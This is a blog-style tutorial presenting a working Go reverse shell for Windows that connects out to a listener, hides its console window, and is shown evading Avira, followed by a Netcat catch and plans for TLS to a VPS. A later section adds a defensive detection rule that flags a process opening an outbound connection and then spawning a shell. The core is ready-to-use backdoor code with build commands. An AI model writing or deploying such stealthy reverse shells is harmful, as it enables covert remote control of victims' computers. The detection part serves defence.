Basic reverse shell in golang (almost undetectable, hide cmd window)

I found it on sysdream.com

First, what is a reverse shell?

A reverse shell, also called a reverse tunnel, is a technique that redirects the input and output of a shell on a local computer to a remote computer, through a service able to interact between the two computers. One of the advantages of this technique is that it makes a local shell accessible from the remote server without being blocked by a firewall.

Let’s code it

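package main

import (
	"net"
	"os"
	"os/exec"
	"syscall"
)

// connectString ("host:port") is set at build time with -X main.connectString=...
var connectString string

func main() {
	if len(connectString) == 0 {
		os.Exit(1)
	}
	// Open an outbound TCP connection to the listener.
	conn, err := net.Dial("tcp", connectString)
	if err != nil {
		os.Exit(1)
	}
	cmd := exec.Command("cmd.exe")
	// Windows-only attribute: start cmd.exe without a visible window.
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	// Bind the shell's input, output and errors to the connection.
	cmd.Stdin = conn
	cmd.Stdout = conn
	cmd.Stderr = conn
	cmd.Run()
}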

Here is the full code!

package main

import (
	"net"
	"os"
	"os/exec"
	"syscall" // needed for SysProcAttr
)

var connectString string

func main() {
	if len(connectString) == 0 {
		os.Exit(1)
	}
	conn, err := net.Dial("tcp", connectString)
	if err != nil {
		os.Exit(1)
	}
	cmd := exec.Command("cmd.exe")
	cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
	cmd.Stdin = conn
	cmd.Stdout = conn
	cmd.Stderr = conn
	cmd.Run()
}

Now we can compile it. Set your IP address (the IP of your hacking box that receives the connection) in the build flags; in my case it’s 192.168.1.32 because I am on my local network. We use port 2233 because it is not in use, but you can use any free port:

go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go

So, let’s give it a try on a Windows VM and your favorite Linux distribution.

As you can see, I use Avira as an antivirus.

You can use Netcat to listen on port 2233 to receive the connection:

Now drag and drop the reverse.exe file and double-click on it; nothing happens from the target's view:

If you run Get-Process to see whether reverse.exe is running, you will see that it is running with no problem at all; Avira did not detect anything!

Now we can take a look at our Netcat:

We have a shell, you can now play with it!!

As I said, it is almost undetectable.
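From the defender's side, the behaviour shown above stays visible in process and network telemetry even when the file itself is not flagged: a binary opens an outbound TCP connection and then starts cmd.exe as its child. The following correlation rule is an added example, not code from the original post or from sysdream.com; the Event type, its field names, the user name and the sample events are constructed for illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is a simplified, hypothetical telemetry record (not a real EDR or Sysmon schema).
type Event struct {
	Kind           string // "net" = outbound TCP connect, "proc" = process creation
	PID, ParentPID int    // ParentPID is set on "proc" events only
	Image, Dest    string // executable path of PID; remote ip:port on "net" events
}

var shells = map[string]bool{"cmd.exe": true, "powershell.exe": true, "pwsh.exe": true}

func base(p string) string { return strings.ToLower(p[strings.LastIndex(p, `\`)+1:]) }

// Detect returns one alert per shell whose parent (not itself a shell)
// has already opened an outbound TCP connection.
func Detect(events []Event) []string {
	conns := map[int]Event{} // PID -> most recent outbound connection
	var alerts []string
	for _, e := range events {
		if e.Kind == "net" {
			conns[e.PID] = e
			continue
		}
		c, ok := conns[e.ParentPID]
		if ok && e.Kind == "proc" && shells[base(e.Image)] && !shells[base(c.Image)] {
			alerts = append(alerts, fmt.Sprintf("%s (pid %d) -> %s spawned %s",
				c.Image, c.PID, c.Dest, base(e.Image)))
		}
	}
	return alerts
}

// Sample returns constructed events: an interactive cmd.exe, the pattern from this post, a browser.
func Sample() []Event {
	return []Event{
		{Kind: "proc", PID: 4100, ParentPID: 900, Image: `C:\Windows\System32\cmd.exe`},
		{Kind: "net", PID: 5200, Image: `C:\Users\bob\Desktop\reverse.exe`, Dest: "192.168.1.32:2233"},
		{Kind: "proc", PID: 5300, ParentPID: 5200, Image: `C:\Windows\System32\cmd.exe`},
		{Kind: "net", PID: 6000, Image: `C:\Program Files\Browser\browser.exe`, Dest: "203.0.113.10:443"},
	}
}

func main() { fmt.Println(strings.Join(Detect(Sample()), "\n")) }
```

On real telemetry the same rule also needs PID-reuse handling and an allowlist for software that legitimately spawns shells after connecting out, such as remote-management agents.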

In the near future I will make the cmd open in the background and do much more, like connecting it to a VPS over a TLS-encrypted connection to try it in real conditions. You can do much more by looking at the author of this code on:

Signed Alix.
